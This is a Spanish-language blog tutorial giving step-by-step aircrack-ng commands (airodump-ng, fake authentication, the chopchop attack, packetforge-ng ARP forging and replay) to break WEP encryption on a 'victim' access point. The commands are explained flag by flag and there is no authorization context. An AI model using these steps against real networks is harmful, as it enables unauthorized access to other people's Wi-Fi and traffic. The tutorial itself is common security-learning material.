como siempre comenzaremos capturando los paquetes con el airodump, identificando el canal en el cual se encuentra la victima.
bash-3.1# airodump-ng ath0 --channel 11 -w captura
luego es necesario crear una autenticación falsa, como habiamos visto en el ejemplo anterior, esto lo hacemos:
aireplay-ng ath0 --fakeauth 20 -e KENOBII -a 00:11:50:XX:XX:XX -h 00:17:9A:XX:XX:XX
donde:
ath0 :interface
--fakeauth 20 :especifica el ataque y establece la peridicidad de este
-e KENOBII :ESSID, en este caso KENOBII
-a 00:11:50:XX:XX:XX :MAC de AP victima
-h 00:17:9A:XX:XX:XX :mi MAC
El comando anterior nos debe mostrar algo así
Ahora es el momento de empezar con el ataque chopchop, y esto lo hacemos utilizando la siguiente linea de comandos:aireplay-ng ath0 --chopchop -b 00:11:50:XX:XX:XX -h 00:17:9A:XX:XX:XX
ath0 :interface
--chopchop :especifica el ataque
-b 00:11:50:XX:XX:XX :MAC de AP victima
-h 00:17:9A:XX:XX:XX :mi MAC
en este momento el programa comienza a leer paquetes
al encontrar un que nos sive nos preguntará, en este momento es necesario fijarnos que el Dest. MAC = FF:FF:FF:FF:FF:FF , ya que esto nos indica que es un broadcast, y esto nos servirá mas adelante
al terminar de "decriptar" el paquete nos muestra algo así:
en algunos manuales he leido que abren el archivo .xor con el tcpdump, con el fin de encontrar una ip que nos de el rango de ip que usa esta red, en este caso yo no hare eso, sinó que creare un arp directamente al broadcast.root@darkstar:~/chopchop# packetforge-ng --arp -a 00:11:50:XX:XX:XX -h 00:17:9A:XX:XX:XX -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-1224-150656.xor -w pakete.cap
donde:
--arp :especifica que creara un arp
-a 00:11:50:XX:XX:XX :especifica la mac de la victima
-h 00:17:9A:XX:XX:XX :mi MAC
-k 255.255.255.255 :ip de destino...(para el caso broadcast)
-l 255.255.255.255 :ip del remitente...=broadcast
-y XXX.xor :archivo PRGA..lo obtenemos del ataque chopchop
-w pakete.cap :archivo donde guardaremos nuestro arp
ahora es el momento de mandar nuestro arp, para generar el trafico, esto lo hacemos así:
root@darkstar:~/chopchop# aireplay-ng ath0 --interactive -r pakete.cap
donde:
ath0 : interface
--interactive : ataque
-r pakete.cap : lee desde el archivo pakete.cap
esto nos mostrará lo siguiente
al enviar el paquete, podemos observar en la ventana de captura un inmenso trafico de información a alta velocidad
Esto nos permitirá, en cosa de minutos, obtener la cantidad de paquetes necesarios para poder crackear la red con aircrack, como el uso de aircrack es relativamente sencillo y ademas se encuentra en el manual anterior, dejaremos este manual asta asqui, espero les halla servido.chop
No hay comentarios:
Publicar un comentario